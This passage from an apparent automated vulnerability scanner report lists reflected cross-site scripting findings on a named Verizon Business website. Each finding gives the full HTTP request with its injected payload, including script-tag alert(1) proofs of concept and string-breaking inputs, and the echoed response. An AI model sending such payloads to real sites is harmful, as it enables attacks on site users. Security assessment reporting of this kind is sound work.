Set-Cookie: BERT=VRID%3d4b3824a3-15c5-4bae-8cc5-b8928559c993|VTID%3da251f6ee-9a88-4aef-a84c-ff69a83be321|SX%3d1289954811|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:35 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:51 GMT
Content-Length: 46585

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a20-111-Mobility.xml531d2</script><script>alert(1)</script>8d3c801e429</url>
...[SNIP]...

1.629. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c74b3"%3b235e1e538a5 was submitted in the REST URL parameter 1. This input was echoed as c74b3";235e1e538a5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc74b3"%3b235e1e538a5/1002a2a21-111-Professional+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:20 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesc74b3";235e1e538a5/1002a2a21-111-Professional+Services.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.630. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8d5'%3b7fec5d3a8f5 was submitted in the REST URL parameter 1. This input was echoed as 5d8d5';7fec5d3a8f5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5d8d5'%3b7fec5d3a8f5/1002a2a21-111-Professional+Services.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:37 GMT
Content-Type: text/html
Content-Length: 40678
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources5d8d5';7fec5d3a8f5/1002a2a21-111-Professional+Services.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.631. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7335b</script><script>alert(1)</script>5597f67b4e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a21-111-Professional+Services.xml7335b</script><script>alert(1)</script>5597f67b4e7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4224016a6f05f2a73ae223d9c8db35d8"
Last-Modified: Wed, 17 Nov 2010 00:26:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d730fee0b-d823-4cbc-9384-99b3ebc48b49|VTID%3d76b37265-bdfb-4544-89ca-7bf5cb33aa5d|SX%3d1289954787|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:11 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:28 GMT
Content-Length: 71449

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a21-111-Professional+Services.xml7335b</script><script>alert(1)</script>5597f67b4e7</url>
...[SNIP]...

1.632. http://www.verizonbusiness.com/resources/1002a2a21-111-Professional+Services.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a21-111-Professional+Services.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 219ae'%3b8ab1ec1477a was submitted in the REST URL parameter 2. This input was echoed as 219ae';8ab1ec1477a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/219ae'%3b8ab1ec1477a HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:38 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/219ae';8ab1ec1477a'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.633. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbd5"%3b6fa1d09fadc was submitted in the REST URL parameter 1. This input was echoed as fbbd5";6fa1d09fadc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfbbd5"%3b6fa1d09fadc/1002a2a22-111-Securing+Your+Enterprise.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesfbbd5";6fa1d09fadc/1002a2a22-111-Securing+Your+Enterprise.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.634. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ec54'%3b24c4106812 was submitted in the REST URL parameter 1. This input was echoed as 2ec54';24c4106812 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2ec54'%3b24c4106812/1002a2a22-111-Securing+Your+Enterprise.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:24:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources2ec54';24c4106812/1002a2a22-111-Securing+Your+Enterprise.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.635. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 814df'%3b9b5170e1c69 was submitted in the REST URL parameter 2. This input was echoed as 814df';9b5170e1c69 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/814df'%3b9b5170e1c69 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/814df';9b5170e1c69'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.636. http://www.verizonbusiness.com/resources/1002a2a22-111-Securing+Your+Enterprise.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a22-111-Securing+Your+Enterprise.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f774</script><script>alert(1)</script>4577e1a5323 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a22-111-Securing+Your+Enterprise.xml3f774</script><script>alert(1)</script>4577e1a5323 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d88caadf51411efb76a9947fbb199eb0"
Last-Modified: Wed, 17 Nov 2010 00:27:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d25d66deb-a24f-41a0-8a15-776ad6448d2f|VTID%3d03b70de1-a12f-446a-b13c-beeaeb2c57d3|SX%3d1289954828|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:27:09 GMT
Content-Length: 45338

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a22-111-Securing+Your+Enterprise.xml3f774</script><script>alert(1)</script>4577e1a5323</url>
...[SNIP]...

1.637. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72740'%3bf0bebdfb517 was submitted in the REST URL parameter 1. This input was echoed as 72740';f0bebdfb517 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72740'%3bf0bebdfb517/1002a2a23-111-Wireless.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:54 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources72740';f0bebdfb517/1002a2a23-111-Wireless.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.638. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f81e8"%3b801cb894d35 was submitted in the REST URL parameter 1. This input was echoed as f81e8";801cb894d35 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf81e8"%3b801cb894d35/1002a2a23-111-Wireless.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:27:14 GMT
Content-Type: text/html
Content-Length: 40652
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:27:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:27:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf81e8";801cb894d35/1002a2a23-111-Wireless.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.639. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 274f8</script><script>alert(1)</script>29480a809b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a23-111-Wireless.xml274f8</script><script>alert(1)</script>29480a809b3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "b742cd8b5792f12a55ff5c5a069588b4"
Last-Modified: Wed, 17 Nov 2010 00:29:12 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d2686429e-f8d7-4b59-9c71-6072a390b94c|VTID%3d815ea803-841e-4bf9-bc70-fe9fd258bc0f|SX%3d1289954952|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:32:56 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:29:12 GMT
Content-Length: 34377

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a23-111-Wireless.xml274f8</script><script>alert(1)</script>29480a809b3</url>
...[SNIP]...

1.640. http://www.verizonbusiness.com/resources/1002a2a23-111-Wireless.xml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a23-111-Wireless.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba8fe'%3be6f9e0e806c was submitted in the REST URL parameter 2. This input was echoed as ba8fe';e6f9e0e806c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ba8fe'%3be6f9e0e806c HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:29:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:29:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:29:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ba8fe';e6f9e0e806c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.641. http://www.verizonbusiness.com/resources/1002a2a24-111-Virtualization.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a24-111-Virtualization.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46cea"%3b22920c2436d was submitted in the REST URL parameter 1. This input was echoed as 46cea";22920c2436d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources46cea"%3b22920c2436d/1002a2a24-111-Virtualization.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
